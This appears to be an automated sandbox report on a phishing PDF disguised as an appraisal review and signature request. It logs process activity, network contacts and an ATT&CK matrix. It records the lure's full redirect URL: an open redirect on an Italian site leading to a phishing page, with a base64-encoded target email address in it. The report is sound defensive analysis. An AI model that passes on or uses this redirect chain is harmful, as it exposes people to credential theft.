Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49675
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.25:49752 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir2296_1637871812

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir2296_1637871812

Jump to behavior

Source: classification engine

Classification label: mal52.phis.winPDF@41/62@14/7

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader124.4.20272.6.log

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: AdobeCollabSync.exe, 0000000A.00000003.1473242444.00000280ADD54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM device_mappings WHERE( content_item_type = :resourceType);
Source: AdobeCollabSync.exe, 0000000A.00000003.1473242444.00000280ADD54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests;

Source: unknown	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Appraisal-nation-Review_and_Signature_Request46074.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1932,i,6939631540764321379,10229849018345657051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241209-180048.133000 --mojo-platform-channel-handle=2296 /prefetch:3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1600,i,12043421776044065048,9780518258914770983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=7748
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=7964
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe" GetChannelUri
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1600,i,12043421776044065048,9780518258914770983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1932,i,6939631540764321379,10229849018345657051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241209-180048.133000 --mojo-platform-channel-handle=2296 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=7748	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe" GetChannelUri	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=7964	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: vccorlib140.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: appcontracts.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\PDFMaker.OfficeAddin

Jump to behavior

Source: Appraisal-nation-Review_and_Signature_Request46074.pdf	Initial sample: PDF keyword /JS count = 0
Source: Appraisal-nation-Review_and_Signature_Request46074.pdf	Initial sample: PDF keyword /JavaScript count = 0

Source: Appraisal-nation-Review_and_Signature_Request46074.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Thread delayed: delay time: 21600000

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Thread delayed: delay time: 21600000			Jump to behavior

Source: AdobeCollabSync.exe, 00000009.00000002.2625112608.000001CB127C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: AdobeCollabSync.exe, 0000000D.00000002.1479180292.0000025ECCD49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRmv
Source: AdobeCollabSync.exe, 0000000A.00000002.2625917754.00000280ABE64000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000B.00000002.1481614812.0000022832565000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 System Information Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://plasticoscorrea.com.br/script/disk/slidercaptcha.css	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/script/	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.png	0%	Avira URL Cloud	safe
https://docs.fastly.com/en/guides/common-400-errors#error-421-misdirected-request	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/script/images/Pic1.jpg	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/script/images/Pic2.jpg	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/script/images/Pic3.jpg	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/favicon.ico	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/script/sliderFail.php	0%	Avira URL Cloud	safe
https://plasticoscorrea.com.br/script/disk/longbow.slidercaptcha.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	216.58.206.68	true	false	high
plasticoscorrea.com.br	162.241.203.181	true	false	high
picsum.photos	104.26.5.30	true	false	high
www.teleboario.it	195.201.80.48	true	false	high
use.fontawesome.com	unknown	unknown	false	high
fastly.picsum.photos	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://plasticoscorrea.com.br/script/disk/longbow.slidercaptcha.js	false	Avira URL Cloud: safe	unknown
https://plasticoscorrea.com.br/script/sliderFail.php	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/news/TopStories_72x72.png	false		high
https://assets.msn.com/service/news/feed/pages/dashboard4?aver=1.1.200.0&over=10.0.22631.4169.amd64fre.ni_release.220506-1250&fring=Retail&devicetype=1&oem=VMware%2C%20Inc.&smode=false&machineId=%7BADA0F343-6E11-4C03-89DA-546517CD1A62%7D&clv=3.0&hver=524.30502.30.0&locale=en-US&region=CH&apikey=lxSNtibdZ45aPe8BHuUR6XwhuuruYfwejEYNpSqgcd&ocid=winp2widget&timeOut=2000&activityId=79a55ed2-c536-4feb-b823-3a9b5e5c40be&user=m-339A2A61895267C400B83F3088FA6607&cm=de-ch&caller=bgtask&theme=light&nw=false&msrc=2&it=app&scn=al_app_anon&clientFeatures=1	false		high
https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xml	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/WindyV2.png	false		high
https://plasticoscorrea.com.br/script/images/Pic1.jpg	false	Avira URL Cloud: safe	unknown
https://plasticoscorrea.com.br/script/disk/slidercaptcha.css	false	Avira URL Cloud: safe	unknown
https://plasticoscorrea.com.br/script/images/Pic3.jpg	false	Avira URL Cloud: safe	unknown
https://otelrules.svc.static.microsoft/rules/rule120603v9s19.xml	false		high
https://plasticoscorrea.com.br/favicon.ico	false	Avira URL Cloud: safe	unknown
https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.png	false	Avira URL Cloud: safe	unknown
https://browser.events.data.msn.cn/OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1736439861541&w=0&anoncknm=al_app_anon&NoResponseBody=true	false		high
https://plasticoscorrea.com.br/script/	true	Avira URL Cloud: safe	unknown
https://plasticoscorrea.com.br/script/images/Pic2.jpg	false	Avira URL Cloud: safe	unknown
https://otelrules.svc.static.microsoft/rules/officeclicktorun.exe-Production-v19.bundle	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://picsum.photos/	chromecache_153.3.dr, chromecache_156.3.dr	false		high
https://docs.fastly.com/en/guides/common-400-errors#error-421-misdirected-request	chromecache_154.3.dr, chromecache_150.3.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.201.80.48	www.teleboario.it	Germany	24940	HETZNER-ASDE	false
104.26.5.30	picsum.photos	United States	13335	CLOUDFLARENETUS	false
162.241.203.181	plasticoscorrea.com.br	United States	26337	OIS1US	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.26
192.168.2.25

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586844
Start date and time:	2025-01-09 17:22:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Appraisal-nation-Review_and_Signature_Request46074.pdf
Detection:	MAL
Classification:	mal52.phis.winPDF@41/62@14/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .pdf

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.18.38.233, 172.64.149.23, 142.250.184.227, 142.250.185.110, 108.177.15.84, 216.58.212.174, 142.250.185.142, 52.48.126.58, 34.246.54.182, 54.228.247.11, 216.58.206.78, 23.56.252.213, 172.64.41.3, 162.159.61.3, 184.30.228.213, 172.217.18.110, 2.16.168.105, 2.16.168.107, 172.217.16.142, 142.250.186.78, 142.250.186.74, 142.250.186.138, 216.58.206.74, 142.250.185.170, 142.250.185.74, 142.250.185.106, 216.58.212.170, 142.250.185.202, 142.250.184.234, 172.217.16.202, 142.250.185.138, 172.217.18.106, 142.250.185.234, 142.250.186.170, 142.250.186.42, 142.250.74.202, 142.250.185.206, 104.21.27.152, 172.67.142.245, 151.101.1.91, 151.101.65.91, 151.101.129.91, 151.101.193.91, 142.250.186.99, 142.250.184.206, 142.250.181.238, 142.250.185.174, 40.113.103.199, 20.190.159.0, 20.190.159.4, 40.126.31.71, 20.190.159.2, 40.126.31.69, 20.190.159.73, 20.190.159.64, 20.190.159.75, 4.245.163.56, 3.219.243.226
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, crt.comodoca.com.cdn.cloudflare.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, acroipm2.adobe.com, wns.notify.trafficmanager.net, clients2.google.com, redirector.gvt1.com, otelrules.svc.static.microsoft, ssl-delivery.adobe.com.edgekey.net, login.live.com, a122.dscd.akamai.net, dualstack.n.sni.global.fastly.net, update.googleapis.com, clients1.google.com, assets.msn.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, accounts.google.com, acroipm2.adobe.com.edgesuite.net, www.tm.v4.a.prd.aadg.akadns.net, www.googleapis.com, p13n.adobe.io, cc-api-data.adobe.io, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, crt.comodoca.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Appraisal-nation-Review_and_Signature_Request46074.pdf

Simulations

Behavior and APIs

Time	Type	Description
11:23:37	API Interceptor	373943x Sleep call for process: AdobeCollabSync.exe modified

QR Codes

Source	URL
Screenshot	https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
Screenshot	https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t

LLM Input / Output

Input	Output
